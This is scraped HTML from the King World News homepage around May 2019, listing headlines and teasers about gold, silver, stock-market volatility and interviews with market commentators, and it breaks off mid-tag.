menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #07E8E9"></span><a href="https://kingworldnews.com/travel/">TRAVEL</a> <ul class="sub-menu"> <li id="menu-item-181980" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/travel/">KWN TRAVEL</a></li> <li id="menu-item-17916" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/travel-msm/">TRAVEL</a></li> </ul> </li> <li id="menu-item-656" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #820099"></span><a href="https://kingworldnews.com/broadcast/">BROADCAST</a> <ul class="sub-menu"> <li id="menu-item-181970" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/broadcast/">KWN BROADCAST</a></li> <li id="menu-item-99973" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/msm-broadcast/">BROADCAST</a></li> <li id="menu-item-250603" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/print/">KWN PRINT</a></li> </ul> </li> <li id="menu-item-95543" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #FF6633"></span><a href="https://kingworldnews.com/headlines/">MSM</a> <ul class="sub-menu"> <li id="menu-item-181977" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/headlines/">US</a></li> <li id="menu-item-17918" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="https://kingworldnews.com/category/world-headlines/">WORLD</a></li> </ul> </li> <li id="menu-item-97069" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent"><span style="background-color: #0000D6"></span><a href="https://kingworldnews.com/contact/">CONTACT</a> <ul class="sub-menu"> <li id="menu-item-181971" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://kingworldnews.com/contact/">CONTACT</a></li> </ul> </li> </ul> </div> </nav> <div class="container top-wrapp-holder"> <div id="breaking-news" class="bx-loading" style="width: 850px;"> <span>Breaking news</span> <ul style="height:10px; visibility:hidden"> <li><a href="https://kingworldnews.com/extreme-readings-have-shown-up-as-investors-yank-money-out-of-stock-funds-at-near-record-pace/">Extreme Readings Have Shown Up As Investors Yank Money Out Of Stock Funds At Near Record Pace</a></li> <li><a href="https://kingworldnews.com/art-cashin-this-is-why-the-stock-market-is-heading-lower-again/">Art Cashin &#8211; This Is Why The Stock Market Is Gyrating&#8230;Again</a></li> <li><a href="https://kingworldnews.com/grosskopf-as-the-cinderella-story-ends-gold-will-benefit/">Grosskopf &#8211; As The Cinderella Story Ends, Gold Will Benefit</a></li> <li><a href="https://kingworldnews.com/turk-here-is-the-exact-level-we-need-to-see-for-a-major-silver-breakout/">SILVER BREAKOUT: James Turk &#8211; Here Is The Exact Level We Need To See For A Major Silver Breakout</a></li> <li><a href="https://kingworldnews.com/james-turk-major-gold-breakout-today-as-counterpary-risk-rises-across-the-globe/">James Turk &#8211; Major Gold Breakout Today As Counterparty Risk Continues To Rise Across The Globe</a></li> </ul> </div> </div> <div class="container"> <div id="primary-fullwidth"> <div class="clear"></div> <div class="category-block-news-1 clearfix"> <div class="category-title" style="background-color: #0000A6"> <h3>KWN TOP STORIES</h3> <a href="https://kingworldnews.com/category/king-world-news/" class="category-link"></a> </div> <div class="main-post"> <div class="entry-meta"> <span class="post-date date updated">May 15, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2> <a href="https://kingworldnews.com/extreme-readings-have-shown-up-as-investors-yank-money-out-of-stock-funds-at-near-record-pace/">Extreme Readings Have Shown Up As Investors Yank Money Out Of Stock Funds At Near Record Pace</a> </h2> <div class="cont-img"> <a href="https://kingworldnews.com/extreme-readings-have-shown-up-as-investors-yank-money-out-of-stock-funds-at-near-record-pace/"> <img src="https://kingworldnews.com/wp-content/uploads/2016/01/50-Year-Veteran-Warns-We-Will-See-Hyperinflation-Chaos-And-Civil-Unrest-Everywhere-622x250_c.jpg" alt="Extreme Readings Have Shown Up As Investors Yank Money Out Of Stock Funds At Near Record Pace" title="Extreme Readings Have Shown Up As Investors Yank Money Out Of Stock Funds At Near Record Pace" /> </a> </div> <p>With the recent spike in volatility in global markets, extreme readings have shown up as investors yank money out of stock funds at near record pace.</p> </div> <ul class="block-news"> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/art-cashin-this-is-why-the-stock-market-is-heading-lower-again/"> <img src="https://kingworldnews.com/wp-content/uploads/2015/08/King-World-News-Art-Cashin-Warns-Worldwide-Liquidation-Scramble-Could-Morph-Into-Full-Blown-2008-Style-Collapse-80x80_c.jpg" alt="Art Cashin &#8211; This Is Why The Stock Market Is Gyrating&#8230;Again" title="Art Cashin &#8211; This Is Why The Stock Market Is Gyrating&#8230;Again" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">May 15, 2019</span> </div> <h2> <a href="https://kingworldnews.com/art-cashin-this-is-why-the-stock-market-is-heading-lower-again/">Art Cashin &#8211; This Is Why The Stock Market Is Gyrating&#8230;Again</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/grosskopf-as-the-cinderella-story-ends-gold-will-benefit/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/05/King-World-News-Grosskopf-As-The-Cinderella-Story-Ends-Gold-Will-Benefit-80x80_c.jpg" alt="Grosskopf &#8211; As The Cinderella Story Ends, Gold Will Benefit" title="Grosskopf &#8211; As The Cinderella Story Ends, Gold Will Benefit" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">May 14, 2019</span> </div> <h2> <a href="https://kingworldnews.com/grosskopf-as-the-cinderella-story-ends-gold-will-benefit/">Grosskopf &#8211; As The Cinderella Story Ends, Gold Will Benefit</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/turk-here-is-the-exact-level-we-need-to-see-for-a-major-silver-breakout/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/04/KWN-Auryn-80x80_c.jpg" alt="SILVER BREAKOUT: James Turk &#8211; Here Is The Exact Level We Need To See For A Major Silver Breakout" title="SILVER BREAKOUT: James Turk &#8211; Here Is The Exact Level We Need To See For A Major Silver Breakout" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">May 14, 2019</span> </div> <h2> <a href="https://kingworldnews.com/turk-here-is-the-exact-level-we-need-to-see-for-a-major-silver-breakout/">SILVER BREAKOUT: James Turk &#8211; Here Is The Exact Level We Need To See For A Major Silver Breakout</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/james-turk-major-gold-breakout-today-as-counterpary-risk-rises-across-the-globe/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/04/King-World-News-Trey-Reik-1300-Gold-Will-Be-Short-Lived-1-80x80_c.jpg" alt="James Turk &#8211; Major Gold Breakout Today As Counterparty Risk Continues To Rise Across The Globe" title="James Turk &#8211; Major Gold Breakout Today As Counterparty Risk Continues To Rise Across The Globe" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">May 13, 2019</span> </div> <h2> <a href="https://kingworldnews.com/james-turk-major-gold-breakout-today-as-counterpary-risk-rises-across-the-globe/">James Turk &#8211; Major Gold Breakout Today As Counterparty Risk Continues To Rise Across The Globe</a> </h2> </div> </li> </ul> </div> <div class="clear"></div> <div class="category-block-news-2 clearfix"> <div class="category-title" style="background-color: #ffdc14"> <h3>KWN TRENDING</h3> <a href="https://kingworldnews.com/category/trending/" class="category-link"></a> </div> <ul class="block-news"> <div class="group-post-list"> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/pierre-lassonde-broadcast-interview-available-now-5-11-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2018/09/Pierre-Lassonde-HS-200x200_c.jpg" alt="Pierre Lassonde: Broadcast Interview – Available Now" title="Pierre Lassonde: Broadcast Interview – Available Now" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">May 11, 2019</span> </div> <h2> <a href="https://kingworldnews.com/pierre-lassonde-broadcast-interview-available-now-5-11-2019/">Pierre Lassonde: Broadcast Interview – Available Now</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/adrian-day-broadcast-interview-available-now-5-4-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2018/10/KWN-Adrian-Day-III-200x200_c.jpg" alt="Adrian Day: Broadcast Interview – Available Now" title="Adrian Day: Broadcast Interview – Available Now" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">May 03, 2019</span> </div> <h2> <a href="https://kingworldnews.com/adrian-day-broadcast-interview-available-now-5-4-2019/">Adrian Day: Broadcast Interview – Available Now</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/andrew-maguire-broadcast-interview-available-now-4-27-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2015/01/King-World-News-Andrew-Maguire-HS-200x200_c.jpg" alt="Andrew Maguire: Broadcast Interview – Available Now" title="Andrew Maguire: Broadcast Interview – Available Now" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">April 26, 2019</span> </div> <h2> <a href="https://kingworldnews.com/andrew-maguire-broadcast-interview-available-now-4-27-2019/">Andrew Maguire: Broadcast Interview – Available Now</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/gerald-celente-broadcast-interview-available-now-4-20-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2015/01/Gerald-Celente.HS_-200x200_c.jpg" alt="Gerald Celente: Broadcast Interview – Available Now" title="Gerald Celente: Broadcast Interview – Available Now" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">April 19, 2019</span> </div> <h2> <a href="https://kingworldnews.com/gerald-celente-broadcast-interview-available-now-4-20-2019/">Gerald Celente: Broadcast Interview – Available Now</a> </h2> </div> </li> </div> <div class="group-post-list"> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/james-turk-broadcast-interview-available-now-4-13-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2017/11/KWN-James-Turk-HS-200x200_c.jpg" alt="James Turk: Broadcast Interview – Available Now" title="James Turk: Broadcast Interview – Available Now" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">April 12, 2019</span> </div> <h2> <a href="https://kingworldnews.com/james-turk-broadcast-interview-available-now-4-13-2019/">James Turk: Broadcast Interview – Available Now</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/egon-von-greyerz-broadcast-interview-available-now-4-6-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2014/12/Egon-von-Greyerz.HS_-200x200_c.jpg" alt="Egon von Greyerz: Broadcast Interview – Available Now" title="Egon von Greyerz: Broadcast Interview – Available Now" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">April 06, 2019</span> </div> <h2> <a href="https://kingworldnews.com/egon-von-greyerz-broadcast-interview-available-now-4-6-2019/">Egon von Greyerz: Broadcast Interview – Available Now</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/peter-boockvar-broadcast-interview-available-now-3-23-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/03/KWN-Peter-Boockvar-Bleakly-Financial-Group-200x200_c.jpg" alt="Peter Boockvar: Broadcast Interview – Available Now" title="Peter Boockvar: Broadcast Interview – Available Now" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">March 23, 2019</span> </div> <h2> <a href="https://kingworldnews.com/peter-boockvar-broadcast-interview-available-now-3-23-2019/">Peter Boockvar: Broadcast Interview – Available Now</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/art-cashin-broadcast-interview-available-now-12-7-2018/"> <img src="https://kingworldnews.com/wp-content/uploads/2014/09/Art-Cashin-KWN-9614-200x200_c.jpg" alt="Art Cashin: Broadcast Interview – Available Now" title="Art Cashin: Broadcast Interview – Available Now" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">December 06, 2018</span> </div> <h2> <a href="https://kingworldnews.com/art-cashin-broadcast-interview-available-now-12-7-2018/">Art Cashin: Broadcast Interview – Available Now</a> </h2> </div> </li> </div> <div class="group-post-list"> </div> </ul> </div> <div class="clear"></div> <div class="category-block-news-5 clearfix"> <div class="category-title" style="background-color: #0000A6"> <h3>KING WORLD NEWS</h3> <a href="https://kingworldnews.com/category/king-world-news/" class="category-link"></a> </div> <article class="main-post post-364542 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/extreme-readings-have-shown-up-as-investors-yank-money-out-of-stock-funds-at-near-record-pace/"> <img src="https://kingworldnews.com/wp-content/uploads/2016/01/50-Year-Veteran-Warns-We-Will-See-Hyperinflation-Chaos-And-Civil-Unrest-Everywhere-275x200_c.jpg" alt="Extreme Readings Have Shown Up As Investors Yank Money Out Of Stock Funds At Near Record Pace" title="Extreme Readings Have Shown Up As Investors Yank Money Out Of Stock Funds At Near Record Pace" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 15, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/extreme-readings-have-shown-up-as-investors-yank-money-out-of-stock-funds-at-near-record-pace/">Extreme Readings Have Shown Up As Investors Yank Money Out Of Stock Funds At Near Record Pace</a></h2> <p>With the recent spike in volatility in global markets, extreme readings have shown up as investors yank money out of stock funds at near record pace.</p> </article> <article class="main-post post-364539 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/art-cashin-this-is-why-the-stock-market-is-heading-lower-again/"> <img src="https://kingworldnews.com/wp-content/uploads/2015/08/King-World-News-Art-Cashin-Warns-Worldwide-Liquidation-Scramble-Could-Morph-Into-Full-Blown-2008-Style-Collapse-275x200_c.jpg" alt="Art Cashin &#8211; This Is Why The Stock Market Is Gyrating&#8230;Again" title="Art Cashin &#8211; This Is Why The Stock Market Is Gyrating&#8230;Again" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 15, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/art-cashin-this-is-why-the-stock-market-is-heading-lower-again/">Art Cashin &#8211; This Is Why The Stock Market Is Gyrating&#8230;Again</a></h2> <p>On the heels of recent volatility in global markets, this is why the stock market is gyrating, again.</p> </article> <article class="main-post post-364536 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/grosskopf-as-the-cinderella-story-ends-gold-will-benefit/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/05/King-World-News-Grosskopf-As-The-Cinderella-Story-Ends-Gold-Will-Benefit-275x200_c.jpg" alt="Grosskopf &#8211; As The Cinderella Story Ends, Gold Will Benefit" title="Grosskopf &#8211; As The Cinderella Story Ends, Gold Will Benefit" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 14, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/grosskopf-as-the-cinderella-story-ends-gold-will-benefit/">Grosskopf &#8211; As The Cinderella Story Ends, Gold Will Benefit</a></h2> <p>On the heels of the recent chaotic trading in global markets, as the Cinderella story ends, gold will benefit.</p> </article> <article class="main-post post-364533 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/turk-here-is-the-exact-level-we-need-to-see-for-a-major-silver-breakout/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/04/KWN-Auryn-275x200_c.jpg" alt="SILVER BREAKOUT: James Turk &#8211; Here Is The Exact Level We Need To See For A Major Silver Breakout" title="SILVER BREAKOUT: James Turk &#8211; Here Is The Exact Level We Need To See For A Major Silver Breakout" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 14, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/turk-here-is-the-exact-level-we-need-to-see-for-a-major-silver-breakout/">SILVER BREAKOUT: James Turk &#8211; Here Is The Exact Level We Need To See For A Major Silver Breakout</a></h2> <p>On the heels of yesterday&#8217;s wild trading, today James Turk told King World News exactly what level will create a major breakout in the silver market.</p> </article> <article class="main-post post-364527 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/james-turk-major-gold-breakout-today-as-counterpary-risk-rises-across-the-globe/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/04/King-World-News-Trey-Reik-1300-Gold-Will-Be-Short-Lived-1-275x200_c.jpg" alt="James Turk &#8211; Major Gold Breakout Today As Counterparty Risk Continues To Rise Across The Globe" title="James Turk &#8211; Major Gold Breakout Today As Counterparty Risk Continues To Rise Across The Globe" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 13, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/james-turk-major-gold-breakout-today-as-counterpary-risk-rises-across-the-globe/">James Turk &#8211; Major Gold Breakout Today As Counterparty Risk Continues To Rise Across The Globe</a></h2> <p>With the Dow tumbling 600 and the Nasdaq plunging over 3.5%, James Turk told King World News there was a major breakout in the gold market today as counterparty risk continues to rise across the globe.</p> </article> <article class="main-post post-364522 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/are-banksters-moving-aggressively-into-gold-silver-and-the-mining-stocks/"> <img src="https://kingworldnews.com/wp-content/uploads/2016/11/KWN-Maguire-I-11122016-275x200_c.jpg" alt="Are Banksters Moving Aggressively Into Gold, Silver And The Mining Stocks?" title="Are Banksters Moving Aggressively Into Gold, Silver And The Mining Stocks?" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 13, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/are-banksters-moving-aggressively-into-gold-silver-and-the-mining-stocks/">Are Banksters Moving Aggressively Into Gold, Silver And The Mining Stocks?</a></h2> <p>With the Dow plunging more than 600 and gold rallying, are the banksters moving aggressively into gold, silver and the mining stocks?</p> </article> <article class="main-post post-364506 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/greyerz-you-must-prepare-now-for-the-elites-nightmare-endgame/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/05/King-World-News-Greyerz-You-Must-Prepare-Now-For-The-Nightmare-Endgame-275x200_c.jpg" alt="Greyerz &#8211; You Must Prepare Now For The Elites&#8217; Nightmare Endgame" title="Greyerz &#8211; You Must Prepare Now For The Elites&#8217; Nightmare Endgame" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 12, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/greyerz-you-must-prepare-now-for-the-elites-nightmare-endgame/">Greyerz &#8211; You Must Prepare Now For The Elites&#8217; Nightmare Endgame</a></h2> <p>As the world edges closer to the next crisis, today the man who has become legendary for his predictions on QE and historic moves in currencies warned King World News that people must prepare now for the elites nightmare endgame.</p> </article> <article class="main-post post-364502 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/pierre-lassonde-audio-interview-released/"> <img src="https://kingworldnews.com/wp-content/uploads/2016/05/King-World-News-BREAKING-Legend-Pierre-Lassonde-Says-Price-Of-Gold-To-Explode-Because-Of-Chinas-Gold-Exchange-275x200_c.jpg" alt="Legend Pierre Lassonde&#8217;s Audio Interview Has Now Been Released!" title="Legend Pierre Lassonde&#8217;s Audio Interview Has Now Been Released!" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 11, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/pierre-lassonde-audio-interview-released/">Legend Pierre Lassonde&#8217;s Audio Interview Has Now Been Released!</a></h2> <p>KWN has now released the timely and powerful audio interview with legend Pierre Lassonde and you can listen to it immediately by CLICKING HERE OR ON THE IMAGE BELOW.</p> </article> <article class="main-post post-364486 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/top-analyst-just-predicted-a-7-plunge-in-the-us-dollar-that-will-ignite-the-gold-market/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/04/King-World-News-Trey-Reik-A-Perfect-Storm-Of-Events-Is-Going-To-Ignite-The-Gold-Price-275x200_c.jpg" alt="Top Analyst Just Predicted A 7% Plunge In The US Dollar That Will Ignite The Gold Market" title="Top Analyst Just Predicted A 7% Plunge In The US Dollar That Will Ignite The Gold Market" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 10, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/top-analyst-just-predicted-a-7-plunge-in-the-us-dollar-that-will-ignite-the-gold-market/">Top Analyst Just Predicted A 7% Plunge In The US Dollar That Will Ignite The Gold Market</a></h2> <p>Today top Citi analyst Tom Fitzpatrick told King World News that the US dollar is now in danger of tumbling much lower. Of course gold bulls have been waiting for the US dollar to give way and ignite a rally in the gold market.</p> </article> <article class="main-post post-364483 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/legend-pierre-lassonde-just-predicted-when-gold-is-going-to-get-tina-turner-legs-and-start-dancing/"> <img src="https://kingworldnews.com/wp-content/uploads/2016/05/King-World-News-BREAKING-Legend-Pierre-Lassonde-Says-Price-Of-Gold-To-Explode-Because-Of-Chinas-Gold-Exchange-275x200_c.jpg" alt="Legend Pierre Lassonde Just Predicted When Gold Is &#8220;Going To Get Tina Turner Legs&#8221; And Start Dancing" title="Legend Pierre Lassonde Just Predicted When Gold Is &#8220;Going To Get Tina Turner Legs&#8221; And Start Dancing" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 09, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/legend-pierre-lassonde-just-predicted-when-gold-is-going-to-get-tina-turner-legs-and-start-dancing/">Legend Pierre Lassonde Just Predicted When Gold Is &#8220;Going To Get Tina Turner Legs&#8221; And Start Dancing</a></h2> <p>On the heels of the recent volatility in the gold and silver markets, today legend Pierre Lassonde spoke with King World News about when he believes the gold market is going to get Tina Turner legs and start dancing.</p> </article> <article class="main-post post-364478 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/celente-trade-wars-cheap-money-and-gold/"> <img src="https://kingworldnews.com/wp-content/uploads/2015/03/KWN-Embry-392015-275x200_c.jpg" alt="Gerald Celente &#8211; Trade Wars, Cheap Money And Gold" title="Gerald Celente &#8211; Trade Wars, Cheap Money And Gold" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 09, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/celente-trade-wars-cheap-money-and-gold/">Gerald Celente &#8211; Trade Wars, Cheap Money And Gold</a></h2> <p>As we approach the end of the second week of trading in May, today the top trends forecaster in the world, Gerald Celente, discussed trade wars, cheap money and gold.</p> </article> <article class="main-post post-364475 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/world-markets-are-tumbling-again/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/01/King-World-News-22God-help-us-when-this-bubble-begins-to-deflate-in-earnest22-275x200_c.jpg" alt="World Markets Are Tumbling&#8230;Again" title="World Markets Are Tumbling&#8230;Again" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 09, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/world-markets-are-tumbling-again/">World Markets Are Tumbling&#8230;Again</a></h2> <p>After yesterday&#8217;s confusing trading, world markets are tumbling once again.</p> </article> <article class="main-post post-364471 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/kiss-it-goodbye/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/03/KWN-Sexy-Hot-Lady-Woman-Stunning-Inflation-Ahead-Dangerous-Curves-Looking-Shock-War-Rabbit-Hole-Rain-Storm-Monica-Belluci-275x200_c.jpg" alt="Kiss It Goodbye" title="Kiss It Goodbye" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 08, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/kiss-it-goodbye/">Kiss It Goodbye</a></h2> <p>On the heels of the recent turbulent trading in global markets, one of the greats today said you can kiss it goodbye.</p> </article> <article class="main-post post-364464 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/art-cashin-jeff-gundlach-and-the-real-reason-for-the-sudden-shift-in-markets/"> <img src="https://kingworldnews.com/wp-content/uploads/2015/08/King-World-News-Art-Cashin-Warns-Worldwide-Liquidation-Scramble-Could-Morph-Into-Full-Blown-2008-Style-Collapse-275x200_c.jpg" alt="Art Cashin &#8211; Jeff Gundlach And The Real Reason For The Sudden Shift In Markets" title="Art Cashin &#8211; Jeff Gundlach And The Real Reason For The Sudden Shift In Markets" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 08, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/art-cashin-jeff-gundlach-and-the-real-reason-for-the-sudden-shift-in-markets/">Art Cashin &#8211; Jeff Gundlach And The Real Reason For The Sudden Shift In Markets</a></h2> <p>On the heels of the Dow and the Nasdaq tumbling, today Art Cashin discusses Jeff Gundlach&#8217;s comments and the real reason for the sudden shift in markets.</p> </article> <article class="main-post post-364460 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/alert-we-are-now-in-on-the-brink/"> <img 